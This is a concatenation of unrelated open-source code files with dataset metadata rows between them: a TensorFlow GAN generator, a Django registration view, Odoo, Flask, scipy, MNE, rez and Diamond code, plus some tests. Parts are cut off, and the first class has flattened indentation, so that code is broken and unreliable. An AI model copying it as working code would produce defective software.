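# one-hot labels `ys` for the conditional case.
def _example_dc_generator_graph(z, ys=None):
    """Illustrative only: wire a small conditional DCGAN generator."""
    generator = GeneratorDC(x_dims=[32, 32], x_ch=3,
                            g_conv_units=[128, 64],
                            g_strides=[2, 2])
    return generator(z, ys)  # image tensor scaled to [-1, 1] by the tanh output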
class GeneratorFlat(object):
""" Fully Connected Conditional Generator.
"""
def __init__(self, x_dims, x_ch, hidden_units,
g_activation_fn=tf.nn.relu,
batch_norm=True):
"""
Fully Connected Conditional Generator network.
        :param x_dims: a list of any size > 0; the x dimensions.
        :param x_ch: int; the channels in x.
        :param hidden_units: a list; the number of units in each fully connected hidden layer.
        :param g_activation_fn: a single activation function, or a list with one activation per hidden layer.
:param batch_norm: if True, enable batch normalization.
"""
# Data Config
if isinstance(x_dims, list) or isinstance(x_dims, tuple):
self.x_dims = x_dims
else:
self.x_dims = [x_dims]
self.x_ch = x_ch
self.batch_norm = batch_norm
self.hidden_units = hidden_units
if not isinstance(g_activation_fn, list) and self.hidden_units is not None:
self.g_activation_fn = [g_activation_fn] * len(self.hidden_units)
else:
self.g_activation_fn = g_activation_fn
def __call__(self, z, ys=None):
if ys is None:
net = z
else:
net = tf.concat([z, ys], axis=1)
with slim.arg_scope([slim.fully_connected],
weights_initializer=tf.truncated_normal_initializer(stddev=0.02),
normalizer_fn=slim.batch_norm if self.batch_norm else None):
for i, (h_unit, activation_fn) in enumerate(zip(self.hidden_units, self.g_activation_fn)):
net = slim.fully_connected(net, h_unit, activation_fn=activation_fn,
scope='g_full{0}'.format(i))
out_units = 1
for dim in self.x_dims:
out_units *= dim
out_units *= self.x_ch
g_out = slim.fully_connected(net, out_units, scope='g_out',
activation_fn=tf.nn.tanh,
biases_initializer=None,
weights_initializer=tf.truncated_normal_initializer(stddev=0.02))
return g_out | gpl-3.0 | -7,486,515,944,308,775,000 | 40.273381 | 112 | 0.55666 | false |
Yellowen/vanda | vanda/auth/views.py | 1 | 6259 | # -----------------------------------------------------------------------------
# Vanda - Web development platform
# Copyright (C) 2011 Some Hackers In Town
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
# -----------------------------------------------------------------------------
from django.shortcuts import render_to_response as rr
from django.template import RequestContext
from django.contrib.auth.models import User
from django.db import transaction
from django.http import (Http404, HttpResponseForbidden,
HttpResponseRedirect)
from django.utils.translation import ugettext as _
from django.contrib.auth import login, authenticate
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required
from forms import PreRegistrationForm, PostRegistrationForm
from mail import VerificationMail
from models import Verification
def pre_register(request):
"""
First step of registeration process. In this step we process
just username and email address and send a verification mail.
"""
if request.method == "POST":
form = PreRegistrationForm(request.POST)
if form.is_valid():
data = form.cleaned_data
# collect queries in a single transaction
with transaction.commit_on_success():
email = User.objects.filter(email=data["email"])
user = User.objects.filter(username=data["username"])
if email or user:
# returning suitable error if email or user already registered
                    if email:
                        form.errors["email"] = (
                            _("This Email is already registered."), )
                    if user:
                        form.errors["username"] = (
                            _("This Username is already registered."), )
return rr("pre_registeration.html",
{"form": form},
context_instance=RequestContext(request))
else:
# Create a user and send the verification mail
user = User(username=data["username"], email=data["email"],
is_active=False)
user.save()
# create verification code and save it in DB
verification_code = Verification(user=user)
code = verification_code.create_verification_code()
vmail = VerificationMail(user, code, request.META["HTTP_HOST"])
vmail.send()
return rr("verification_sent.html")
else:
return rr("pre_registeration.html",
{"form": form},
context_instance=RequestContext(request))
else:
form = PreRegistrationForm()
return rr("pre_registeration.html",
{"form": form},
context_instance=RequestContext(request))
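# Editor's note (illustrative URLconf wiring; the patterns below are
# assumptions, not taken from this project):
#   url(r'^register/$', 'vanda.auth.views.pre_register'),
#   url(r'^register/complete/$', 'vanda.auth.views.post_register'),
#   url(r'^verify/(?P<code>\w+)/$', 'vanda.auth.views.verificate_email'),
# so that the link mailed by VerificationMail resolves back to
# verificate_email() with the emailed code as its `code` argument.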
def post_register(request):
"""
    Complete the registration by asking the user to fill in extra information.
"""
user = None
if "user" in request.session:
user = request.session["user"]
else:
return HttpResponseForbidden()
if request.method == "POST":
form = PostRegistrationForm(request.POST)
if form.is_valid():
try:
form.save(user)
except form.PasswordError, e:
form.errors["password1"] = unicode(e)
form.errors["password2"] = unicode(e)
return rr("post_registeration.html",
{"form": form},
context_instance=RequestContext(request))
user = authenticate(username=user.username,
password=form.cleaned_data["password1"])
login(request, user)
return HttpResponseRedirect(reverse("auth.views.profile",
args=[]))
else:
return rr("post_registeration.html",
{"form": form},
context_instance=RequestContext(request))
else:
form = PostRegistrationForm()
return rr("post_registeration.html",
{"form": form},
context_instance=RequestContext(request))
@login_required
def profile(request):
"""
User profile main view.
"""
pass
def ajax_js(request):
"""
    Return suitable JavaScript code for the given URL.
"""
url = request.GET.get("validator", None)
if url:
return rr("validator.js", {"url": url})
else:
raise Http404()
def verificate_email(request, code):
"""
Get the verification code and verify the user mail.
"""
# Look for given verification code
try:
verification = Verification.objects.get(code=code)
except Verification.DoesNotExist:
# always riase a 404 status code for invalid code
raise Http404()
    # if the verification code was sent in the last 48 hours
if verification.is_valid():
# Activating user
user = verification.user
user.is_active = True
user.save()
request.session["user"] = user
verification.delete()
form = PostRegistrationForm()
return rr("post_registeration.html",
{"form": form},
context_instance=RequestContext(request))
else:
# If code expired.
verification.delete()
raise Http404()
| gpl-2.0 | 67,268,331,838,765,720 | 34.361582 | 79 | 0.579006 | false |
akretion/odoo | addons/stock/wizard/stock_rules_report.py | 13 | 2224 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
class StockRulesReport(models.TransientModel):
_name = 'stock.rules.report'
_description = 'Stock Rules report'
product_id = fields.Many2one('product.product', string='Product', required=True)
    product_tmpl_id = fields.Many2one('product.template', string='Product Template', required=True)
warehouse_ids = fields.Many2many('stock.warehouse', string='Warehouses', required=True,
help="Show the routes that apply on selected warehouses.")
product_has_variants = fields.Boolean('Has variants', default=False, required=True)
@api.model
def default_get(self, fields):
res = super(StockRulesReport, self).default_get(fields)
product_tmpl_id = False
if 'product_id' in fields:
if self.env.context.get('default_product_id'):
product_id = self.env['product.product'].browse(self.env.context['default_product_id'])
product_tmpl_id = product_id.product_tmpl_id
res['product_tmpl_id'] = product_id.product_tmpl_id.id
res['product_id'] = product_id.id
elif self.env.context.get('default_product_tmpl_id'):
product_tmpl_id = self.env['product.template'].browse(self.env.context['default_product_tmpl_id'])
res['product_tmpl_id'] = product_tmpl_id.id
res['product_id'] = product_tmpl_id.product_variant_id.id
if len(product_tmpl_id.product_variant_ids) > 1:
res['product_has_variants'] = True
if 'warehouse_ids' in fields:
warehouse_id = self.env['stock.warehouse'].search([], limit=1).id
res['warehouse_ids'] = [(6, 0, [warehouse_id])]
return res
def _prepare_report_data(self):
data = {
'product_id': self.product_id.id,
'warehouse_ids': self.warehouse_ids.ids,
}
return data
def print_report(self):
self.ensure_one()
data = self._prepare_report_data()
return self.env.ref('stock.action_report_stock_rule').report_action(None, data=data)
| agpl-3.0 | 5,978,778,199,090,360,000 | 44.387755 | 114 | 0.623201 | false |
LabAdvComp/tukey_middleware | tukey_middleware/modules/instance_metadata/user_info.py | 1 | 3366 | # Copyright 2013 Open Cloud Consortium
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import flask
import json
import requests
from flask import request, g
from keystoneclient.v2_0 import client
from tukey_middleware import local_settings
from tukey_middleware.auth.base import TukeyAuthException
from tukey_middleware.flask_utils import with_user, return_error
rest = flask.Blueprint('v0', __name__)
settings = local_settings.vm_ip_auth
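# Editor's note (illustrative; the URL prefix is an assumption, not taken from
# this module): the blueprint above is mounted by the middleware's Flask app,
# roughly as app.register_blueprint(rest, url_prefix='/v0/instance_metadata'),
# after which e.g. GET <prefix>/password returns the caller's OpenStack/samba
# password for the default cloud.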
@rest.route('/')
def default_info():
'''
Return JSON packed with all of the user's info:
username, password, identifiers.
'''
return get_info(cloud_name=settings["default"])
@rest.route('/cloud')
def get_cloud():
''' return the default cloud'''
return settings["default"]
@rest.route('/<cloud_name>/')
@return_error
@with_user(rest, use_cloud_name=True)
def get_info(cloud_name):
''' return all of the user info '''
try:
password = g.user.password()
identifiers = g.user.identifiers()
except TukeyAuthException:
password = ""
identifiers = []
return json.dumps({
"username": g.user.username(),
"tenant_name": g.user.tenant_name(),
"password": password,
"identifiers": identifiers,
"cloud_name": cloud_name
})
@rest.route('/password')
def default_password():
'''
Return the user's samba/OpenStack password.
If there is no cloud specified look in the settings file for a default.
This allows the OSDC init-cloud.sh to be the same across clouds
'''
return get_password(cloud_name=settings["default"])
@rest.route('/username')
def default_username():
return get_username(cloud_name=settings["default"])
@rest.route('/identifiers')
def default_identifiers():
return get_identifiers(cloud_name=settings["default"])
@rest.route('/tenant_name')
def default_tenant_name():
return get_tenant_name(cloud_name=settings["default"])
@rest.route('/<cloud_name>/password')
@return_error
@with_user(rest, use_cloud_name=True)
def get_password(cloud_name=None):
''' return the users openstack/samba password '''
return g.user.password() if g.user.password() is not None else ""
@rest.route('/<cloud_name>/username')
@return_error
@with_user(rest, use_cloud_name=True)
def get_username(cloud_name=None):
''' return the username '''
return g.user.username() if g.user.username() is not None else ""
@rest.route('/<cloud_name>/identifiers')
@return_error
@with_user(rest, use_cloud_name=True)
def get_identifiers(cloud_name=None):
''' return single sign on indentifiers '''
return json.dumps(g.user.identifiers())
@rest.route('/<cloud_name>/tenant_name')
@return_error
@with_user(rest, use_cloud_name=True)
def get_tenant_name(cloud_name=None):
''' return the tenant name '''
return g.user.tenant_name()
| apache-2.0 | 4,318,000,108,861,852,700 | 26.365854 | 76 | 0.690434 | false |
hemmerling/python-coursera2012 | src/week8/week8_test.py | 1 | 7877 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
# @package coursera2012
# @author Rolf Hemmerling <[email protected]>
# @version 1.00
# @date 2015-01-01
# @copyright Apache License, Version 2.0
#
# Implementation of the game
# "Asteroids"
# for the Coursera course
# "An Introduction to Interactive Programming in Python"
#
# Copyright 2012-2015 Rolf Hemmerling
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
# import modules
import unittest
from simplegui import Canvas
from asteroids import ImageInfo
from asteroids import Ship
from asteroids import Sprite
from asteroids import AsteroidsGame
#from asteroids import ship_image
ship_image = None
class ImageInfo_getCenterTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
center = [1,1]
size = 1
self.imageinfo = ImageInfo(center, size)
def testGetCenter(self):
center = [1,1]
self.imageinfo.center = center
assert self.imageinfo.get_center() == center, 'ImageInfo.get_center() does not provide the right return value'
class ImageInfo_getSizeTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
center = [1,1]
size = 1
self.imageinfo = ImageInfo(center, size)
def testGetSize(self):
size = 1
self.imageinfo.size = size
assert self.imageinfo.get_size() == size, 'ImageInfo.get_size() does not provide the right return value'
class ImageInfo_getRadiusTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
center = [1,1]
size = 1
self.imageinfo = ImageInfo(center, size)
def testGetRadius(self):
radius = 1
self.imageinfo.radius = radius
assert self.imageinfo.get_radius() == radius, 'ImageInfo.get_radius() does not provide the right return value'
class ImageInfo_getLifespanTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
center = [1,1]
size = 1
self.imageinfo = ImageInfo(center, size)
def testGetLifespan(self):
lifespan = 1
self.imageinfo.lifespan = lifespan
assert self.imageinfo.get_lifespan() == lifespan, 'ImageInfo.get_radius() does not provide the right return value'
class ImageInfo_getAnimatedTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
center = [1,1]
size = 1
self.imageinfo = ImageInfo(center, size)
def testGetAnimated(self):
animated = False
self.imageinfo.lifespan = animated
assert self.imageinfo.get_animated() == animated, 'ImageInfo.get_animated() does not provide the right return value'
class Ship_drawTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
global ship_image
self.asteroids = AsteroidsGame()
self.asteroids.init()
pos = [1,1]
vel = [1,1]
angle = 0
image = ship_image
center = [1,1]
size = 1
info = ImageInfo(center, size)
self.ship = Ship( pos, vel, angle, image, info)
def testDraw(self):
canvas = Canvas()
self.ship.pos = [1,1]
self.ship.radius = 0
assert self.ship.draw(canvas) == None, 'Ship.draw() does not provide the right return value'
class Ship_updateTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
global ship_image
self.asteroids = AsteroidsGame()
self.asteroids.init()
pos = [1,1]
vel = [1,1]
angle = 0
image = ship_image
center = [1,1]
size = 1
info = ImageInfo(center, size)
self.ship = Ship( pos, vel, angle, image, info)
def testUpdate(self):
assert self.ship.update() == None, 'Ship.draw() does not provide the right return value'
class Sprite_drawTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
pos =[0,0]
vel = [0,0]
ang = 0.0
ang_vel= [0,0]
image = None
center = [1,1]
size = 1
info = ImageInfo(center, size)
self.sprite = Sprite(pos, vel, ang, ang_vel, image, info)
def testDraw(self):
canvas = Canvas()
assert self.sprite.draw(canvas) == None, 'Sprite.draw() does not provide the right return value'
class Sprite_updateTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
pos =[0,0]
vel = [0,0]
ang = 0.0
ang_vel= [0,0]
image = None
center = [1,1]
size = 1
info = ImageInfo(center, size)
self.sprite = Sprite(pos, vel, ang, ang_vel, image, info)
def testUpdate(self):
assert self.sprite.update() == None, 'Sprite.update() does not provide the right return value'
class AsteroidsGame_initTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.asteroids = AsteroidsGame()
def testInit(self):
assert self.asteroids.init() == None, 'AsteroidsGame.init() does not provide the right return value'
class AsteroidsGame_angleToVectorTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.asteroids = AsteroidsGame()
def testAngle_ToVector(self):
vector = [1, 0]
        assert self.asteroids.angle_to_vector(0) == vector, 'AsteroidsGame.angle_to_vector() does not provide the right return value'
class AsteroidsGame_distTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.asteroids = AsteroidsGame()
def testDist(self):
a = [0, 1]
b = [0, 0]
dist = 1
        assert self.asteroids.dist(a,b) == dist, 'AsteroidsGame.dist() does not provide the right return value'
class AsteroidsGame_drawTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.asteroids = AsteroidsGame()
self.asteroids.init()
def testDraw(self):
canvas = Canvas()
assert self.asteroids.draw(canvas) == None, 'AsteroidsGame.draw() does not provide the right return value'
class AsteroidsGame_rockSpawnerTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.asteroids = AsteroidsGame()
def testRockSpawner(self):
assert self.asteroids.rock_spawner() == None, 'AsteroidsGame.rock_spawner() does not provide the right return value'
class AsteroidsGame_mainTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.asteroids = AsteroidsGame()
def testMain(self):
assert self.asteroids.main() == None, 'AsteroidsGame.main() does not provide the right return value'
# run all tests
if __name__ == "__main__":
try:
unittest.main()
except SystemExit as inst:
if inst.args[0] is True: # raised by sys.exit(True) when tests failed
raise
| apache-2.0 | 4,969,938,699,966,351,000 | 28.296154 | 133 | 0.610258 | false |
person142/scipy | scipy/ndimage/tests/test_regression.py | 5 | 1286 | import numpy as np
from numpy.testing import assert_array_almost_equal
import scipy.ndimage as ndimage
def test_byte_order_median():
"""Regression test for #413: median_filter does not handle bytes orders."""
a = np.arange(9, dtype='<f4').reshape(3, 3)
ref = ndimage.filters.median_filter(a,(3, 3))
b = np.arange(9, dtype='>f4').reshape(3, 3)
t = ndimage.filters.median_filter(b, (3, 3))
assert_array_almost_equal(ref, t)
def test_zoom_output_shape():
"""Ticket #643"""
x = np.arange(12).reshape((3,4))
ndimage.zoom(x, 2, output=np.zeros((6,8)))
def test_ticket_742():
def SE(img, thresh=.7, size=4):
mask = img > thresh
rank = len(mask.shape)
la, co = ndimage.label(mask,
ndimage.generate_binary_structure(rank, rank))
_ = ndimage.find_objects(la)
if np.dtype(np.intp) != np.dtype('i'):
shape = (3,1240,1240)
a = np.random.rand(np.prod(shape)).reshape(shape)
# shouldn't crash
SE(a)
def test_gh_issue_3025():
"""Github issue #3025 - improper merging of labels"""
d = np.zeros((60,320))
d[:,:257] = 1
d[:,260:] = 1
d[36,257] = 1
d[35,258] = 1
d[35,259] = 1
assert ndimage.label(d, np.ones((3,3)))[1] == 1
| bsd-3-clause | 2,966,640,725,355,072,500 | 27.577778 | 79 | 0.578538 | false |
mne-tools/mne-tools.github.io | 0.14/_downloads/plot_evoked_delayed_ssp.py | 22 | 3873 | """
=========================================
Create evoked objects in delayed SSP mode
=========================================
This script shows how to apply SSP projectors delayed, that is,
at the evoked stage. This is particularly useful to support decisions
related to the trade-off between denoising and preserving signal.
We first will extract Epochs and create evoked objects
with the required settings for delayed SSP application.
Then we will explore the impact of the particular SSP projectors
on the evoked data.
"""
# Authors: Alexandre Gramfort <[email protected]>
# Denis Engemann <[email protected]>
#
# License: BSD (3-clause)
import matplotlib.pyplot as plt
import mne
from mne import io
from mne.datasets import sample
print(__doc__)
data_path = sample.data_path()
###############################################################################
# Set parameters
raw_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw.fif'
event_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw-eve.fif'
event_id, tmin, tmax = 1, -0.2, 0.5
# Setup for reading the raw data
raw = io.Raw(raw_fname, preload=True)
raw.filter(1, 40, method='iir')
events = mne.read_events(event_fname)
# pick magnetometer channels
picks = mne.pick_types(raw.info, meg='mag', stim=False, eog=True,
include=[], exclude='bads')
# If we suspend SSP projection at the epochs stage we might reject
# more epochs than necessary. To deal with this we set proj to `delayed`
# while passing reject parameters. Each epoch will then be projected before
# performing peak-to-peak amplitude rejection. If it survives the rejection
# procedure the unprojected raw epoch will be employed instead.
# As a consequence, the point in time at which the projection is applied will
# not have impact on the final results.
# We will make use of this function to prepare for interactively selecting
# projections at the evoked stage.
epochs = mne.Epochs(raw, events, event_id, tmin, tmax, picks=picks,
baseline=None, reject=dict(mag=4e-12),
proj='delayed')
evoked = epochs.average() # average epochs and get an Evoked dataset.
###############################################################################
# Interactively select / deselect the SSP projection vectors
# Here we expose the details of how to apply SSPs reversibly
title = 'Incremental SSP application'
# let's first move the proj list to another location
projs, evoked.info['projs'] = evoked.info['projs'], []
fig, axes = plt.subplots(2, 2) # create 4 subplots for our four vectors
# As the bulk of projectors was extracted from the same source, we can simply
# iterate over our collection of projs and add them step by step to see how
# the signals change as a function of the SSPs applied. As this operation
# can't be undone we will operate on copies of the original evoked object to
# keep things reversible.
for proj, ax in zip(projs, axes.flatten()):
evoked.add_proj(proj) # add projection vectors loop by loop.
evoked.copy().apply_proj().plot(axes=ax) # apply on a copy of evoked
ax.set_title('+ %s' % proj['desc']) # extract description.
plt.suptitle(title)
mne.viz.tight_layout()
# We also could have easily visualized the impact of single projection vectors
# by deleting the vector directly after visualizing the changes.
# E.g. had we appended the following line to our loop:
# `evoked.del_proj(-1)`
# Often, it is desirable to interactively explore data. To make this more
# convenient we can make use of the 'interactive' option. This will open a
# check box that allows us to reversibly select projection vectors. Any
# modification of the selection will immediately cause the figure to update.
evoked.plot(proj='interactive')
# Hint: the same works with evoked.plot_topomap
| bsd-3-clause | 9,072,494,202,869,819,000 | 39.768421 | 79 | 0.695068 | false |
LumaPictures/rez | src/rezplugins/shell/cmd.py | 3 | 8202 | """
Windows Command Prompt (DOS) shell.
"""
from rez.config import config
from rez.rex import RexExecutor, literal
from rez.shells import Shell
from rez.system import system
from rez.utils.platform_ import platform_
from rez.util import shlex_join
import os
import re
import subprocess
class CMD(Shell):
# For reference, the ss64 web page provides useful documentation on builtin
# commands for the Windows Command Prompt (cmd). It can be found here :
# http://ss64.com/nt/cmd.html
syspaths = None
_executable = None
@property
def executable(cls):
if cls._executable is None:
cls._executable = Shell.find_executable('cmd')
return cls._executable
@classmethod
def name(cls):
return 'cmd'
@classmethod
def file_extension(cls):
return 'bat'
@classmethod
def startup_capabilities(cls, rcfile=False, norc=False, stdin=False,
command=False):
cls._unsupported_option('rcfile', rcfile)
rcfile = False
cls._unsupported_option('norc', norc)
norc = False
cls._unsupported_option('stdin', stdin)
stdin = False
return (rcfile, norc, stdin, command)
@classmethod
def get_startup_sequence(cls, rcfile, norc, stdin, command):
rcfile, norc, stdin, command = \
cls.startup_capabilities(rcfile, norc, stdin, command)
return dict(
stdin=stdin,
command=command,
do_rcfile=False,
envvar=None,
files=[],
bind_files=[],
source_bind_files=(not norc)
)
@classmethod
def get_syspaths(cls):
if not cls.syspaths:
paths = []
cmd = ["REG", "QUERY", "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "/v", "PATH"]
expected = "\r\nHKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\Environment\r\n PATH REG_(EXPAND_)?SZ (.*)\r\n\r\n"
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
out_, _ = p.communicate()
if p.returncode == 0:
match = re.match(expected, out_)
if match:
paths.extend(match.group(2).split(os.pathsep))
cmd = ["REG", "QUERY", "HKCU\\Environment", "/v", "PATH"]
expected = "\r\nHKEY_CURRENT_USER\\\\Environment\r\n PATH REG_(EXPAND_)?SZ (.*)\r\n\r\n"
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
out_, _ = p.communicate()
if p.returncode == 0:
match = re.match(expected, out_)
if match:
paths.extend(match.group(2).split(os.pathsep))
cls.syspaths = set([x for x in paths if x])
return cls.syspaths
def _bind_interactive_rez(self):
if config.set_prompt and self.settings.prompt:
stored_prompt = os.getenv("REZ_STORED_PROMPT")
curr_prompt = stored_prompt or os.getenv("PROMPT", "")
if not stored_prompt:
self.setenv("REZ_STORED_PROMPT", curr_prompt)
new_prompt = "%%REZ_ENV_PROMPT%%"
new_prompt = (new_prompt + " %s") if config.prefix_prompt \
else ("%s " + new_prompt)
new_prompt = new_prompt % curr_prompt
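            # e.g. with prefix_prompt enabled and a stock "$P$G" prompt this
            # writes (illustrative): set PROMPT=%REZ_ENV_PROMPT% $P$G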
self._addline('set PROMPT=%s' % new_prompt)
def spawn_shell(self, context_file, tmpdir, rcfile=None, norc=False,
stdin=False, command=None, env=None, quiet=False,
pre_command=None, **Popen_args):
startup_sequence = self.get_startup_sequence(rcfile, norc, bool(stdin), command)
shell_command = None
def _record_shell(ex, files, bind_rez=True, print_msg=False):
ex.source(context_file)
if startup_sequence["envvar"]:
ex.unsetenv(startup_sequence["envvar"])
if bind_rez:
ex.interpreter._bind_interactive_rez()
if print_msg and not quiet:
# ex.info('')
# ex.info('You are now in a rez-configured environment.')
# ex.info('')
if system.is_production_rez_install:
# previously this was called with the /K flag, however
# that would leave spawn_shell hung on a blocked call
# waiting for the user to type "exit" into the shell that
# was spawned to run the rez context printout
ex.command("cmd /Q /C rez context")
def _create_ex():
return RexExecutor(interpreter=self.new_shell(),
parent_environ={},
add_default_namespaces=False)
executor = _create_ex()
if self.settings.prompt:
newprompt = '%%REZ_ENV_PROMPT%%%s' % self.settings.prompt
executor.interpreter._saferefenv('REZ_ENV_PROMPT')
executor.env.REZ_ENV_PROMPT = literal(newprompt)
if startup_sequence["command"] is not None:
_record_shell(executor, files=startup_sequence["files"])
shell_command = startup_sequence["command"]
else:
_record_shell(executor, files=startup_sequence["files"], print_msg=(not quiet))
if shell_command:
executor.command(shell_command)
executor.command('exit %errorlevel%')
code = executor.get_output()
target_file = os.path.join(tmpdir, "rez-shell.%s"
% self.file_extension())
with open(target_file, 'w') as f:
f.write(code)
if startup_sequence["stdin"] and stdin and (stdin is not True):
Popen_args["stdin"] = stdin
cmd = []
if pre_command:
if isinstance(pre_command, basestring):
cmd = pre_command.strip().split()
else:
cmd = pre_command
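        # /Q turns command echoing off and /K keeps the spawned cmd.exe
        # running after it executes the generated rez-shell .bat file.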
cmd = cmd + [self.executable, "/Q", "/K", target_file]
p = subprocess.Popen(cmd, env=env, **Popen_args)
return p
def escape_string(self, value):
return value
def _saferefenv(self, key):
pass
def shebang(self):
pass
def setenv(self, key, value):
value = self.escape_string(value)
self._addline('set %s=%s' % (key, value))
def unsetenv(self, key):
self._addline("set %s=" % key)
def resetenv(self, key, value, friends=None):
self._addline(self.setenv(key, value))
def alias(self, key, value):
self._addline("doskey %s=%s" % (key, value))
def comment(self, value):
for line in value.split('\n'):
self._addline(': %s' % line)
def info(self, value):
for line in value.split('\n'):
self._addline('echo %s' % line)
def error(self, value):
for line in value.split('\n'):
self._addline('echo "%s" 1>&2' % line)
def source(self, value):
self._addline("call %s" % value)
def command(self, value):
self._addline(value)
def get_key_token(self, key):
return "%%%s%%" % key
def join(self, command):
return shlex_join(command).replace("'", '"')
def register_plugin():
if platform_.name == "windows":
return CMD
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
| lgpl-3.0 | 6,841,379,534,693,779,000 | 33.607595 | 171 | 0.570105 | false |
disqus/Diamond | src/collectors/mysql/test/testmysql.py | 6 | 4231 | #!/usr/bin/python
# coding=utf-8
################################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from test import run_only
from mock import Mock
from mock import patch
from diamond.collector import Collector
from mysql import MySQLCollector
################################################################################
def run_only_if_MySQLdb_is_available(func):
try:
import MySQLdb
MySQLdb # workaround for pyflakes issue #13
except ImportError:
MySQLdb = None
pred = lambda: MySQLdb is not None
return run_only(func, pred)
class TestMySQLCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('MySQLCollector', {
'slave': 'True',
'master': 'True',
'innodb': 'True',
'hosts': ['root:@localhost:3306/mysql'],
'interval': '1',
})
self.collector = MySQLCollector(config, None)
def test_import(self):
self.assertTrue(MySQLCollector)
@run_only_if_MySQLdb_is_available
@patch.object(MySQLCollector, 'connect', Mock(return_value=True))
@patch.object(MySQLCollector, 'disconnect', Mock(return_value=True))
@patch.object(Collector, 'publish')
def test_real_data(self, publish_mock):
p_global_status = patch.object(
MySQLCollector,
'get_db_global_status',
Mock(return_value=self.getPickledResults(
'mysql_get_db_global_status_1.pkl')))
p_master_status = patch.object(
MySQLCollector,
'get_db_master_status',
Mock(return_value=self.getPickledResults(
'get_db_master_status_1.pkl')))
p_slave_status = patch.object(
MySQLCollector,
'get_db_slave_status',
Mock(return_value=self.getPickledResults(
'get_db_slave_status_1.pkl')))
p_innodb_status = patch.object(
MySQLCollector,
'get_db_innodb_status',
Mock(return_value=[{}]))
p_global_status.start()
p_master_status.start()
p_slave_status.start()
p_innodb_status.start()
self.collector.collect()
p_global_status.stop()
p_master_status.stop()
p_slave_status.stop()
p_innodb_status.stop()
self.assertPublishedMany(publish_mock, {})
p_global_status = patch.object(
MySQLCollector,
'get_db_global_status',
Mock(return_value=self.getPickledResults(
'mysql_get_db_global_status_2.pkl')))
p_master_status = patch.object(
MySQLCollector,
'get_db_master_status',
Mock(return_value=self.getPickledResults(
'get_db_master_status_2.pkl')))
p_slave_status = patch.object(
MySQLCollector,
'get_db_slave_status',
Mock(return_value=self.getPickledResults(
'get_db_slave_status_2.pkl')))
p_innodb_status = patch.object(
MySQLCollector,
'get_db_innodb_status',
Mock(return_value=[{}]))
p_global_status.start()
p_master_status.start()
p_slave_status.start()
p_innodb_status.start()
self.collector.collect()
p_global_status.stop()
p_master_status.stop()
p_slave_status.stop()
p_innodb_status.stop()
metrics = {}
metrics.update(self.getPickledResults(
'mysql_get_db_global_status_expected.pkl'))
metrics.update(self.getPickledResults(
'get_db_master_status_expected.pkl'))
metrics.update(self.getPickledResults(
'get_db_slave_status_expected.pkl'))
self.assertPublishedMany(publish_mock, metrics)
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
################################################################################
if __name__ == "__main__":
unittest.main()
| mit | 3,490,338,835,165,256,700 | 32.314961 | 80 | 0.552352 | false |
GenericStudent/home-assistant | homeassistant/components/arduino/sensor.py | 9 | 1619 | """Support for getting information from Arduino pins."""
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_NAME
import homeassistant.helpers.config_validation as cv
